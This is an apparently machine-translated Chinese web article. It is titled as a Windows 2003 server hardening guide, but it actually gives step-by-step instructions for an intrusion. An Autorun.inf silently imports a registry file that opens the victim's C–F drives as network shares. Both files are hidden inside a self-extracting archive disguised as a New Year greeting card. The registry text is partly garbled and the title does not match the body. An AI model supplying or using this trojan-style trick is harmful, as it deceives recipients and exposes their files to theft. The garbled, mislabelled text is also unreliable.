系统安全之WIN2003服务器安全加固方案
用自解压包擦除别人的硬盘,相信大家都会。我给你介绍一种用自解压包入侵的方法。
如果把木马绑在别人身上,只要有点常识的人都有杀毒软件就能识破。如果不使用木马,可以使用批量炸弹、碎片化的对象文件,或者自行导入的注册表文件来实现各种攻击。
将下面两行另存为Autorun.inf
[自动运行]
open=regedit /s Autorun.reg
将以下段落另存为Autorun.reg
注册表4蠕虫网络技术http://www.chinaccna.com
[HKEY _ LOCAL _ MACHINE \ Software \ Microsoft \ Windows \ current version \ Network \ Lanman \ c $]
" Path"="c:\ "
"备注" = " "
" Type"=dword:00000000
" Flags"=dword:00000192
" Parm1enc " =十六进制:
" Parm2enc " =十六进制:
[HKEY _ LOCAL _ MACHINE \ Software \ Microsoft \ Windows \ current version \ Network \ Lanman \ D $]
" Path"="D:\ "
"备注" = " "
" Type"=dword:00000000
" Flags"=dword:00000192
" Parm1enc " =十六进制:
" Parm2enc " =十六进制:
[HKEY _ LOCAL _ MACHINE \ Software \ Microsoft \ Windows \ current version \ Network \ Lanman \ E $]
" Path"="E:\ "
"备注" = " "
" Type"=dword:00000000
" Flags"=dword:00000192
" Parm1enc " =十六进制:
" Parm2enc " =十六进制:
[HKEY _ LOCAL _ MACHINE \ Software \ Microsoft \ Windows \ current version \ Network \ Lanman \ F $]
" Path"="F:\ "
"备注" = " "
" Type"=dword:00000000
" Flags"=dword:00000192
" Parm1enc " =十六进制:
" Parm2enc"=hex:
比如在如今这个电子贺卡满天飞的时代,你可以把自己的自我解压包命名为“猴年贺卡”,里面放一张真正的贺卡。顺便把上面两个文档打包,注意指定文档的解包路径。当贺卡接收者点击自解压包时,真正的贺卡被解压,两个文件被悄悄解压到指定位置。Autorun.inf必须解析到一个分区的根目录,名称不能更改,可以设置文件隐藏属性。
Autorun.reg的文件名和发布目录可以任意,可以更好的隐藏。注意,Autorun.inf指向目录的正确位置。
当受害者用Autorun.inf双击分区时,其硬盘的C、D、E、F分区被打开供公众享用。
位律师回复
0条评论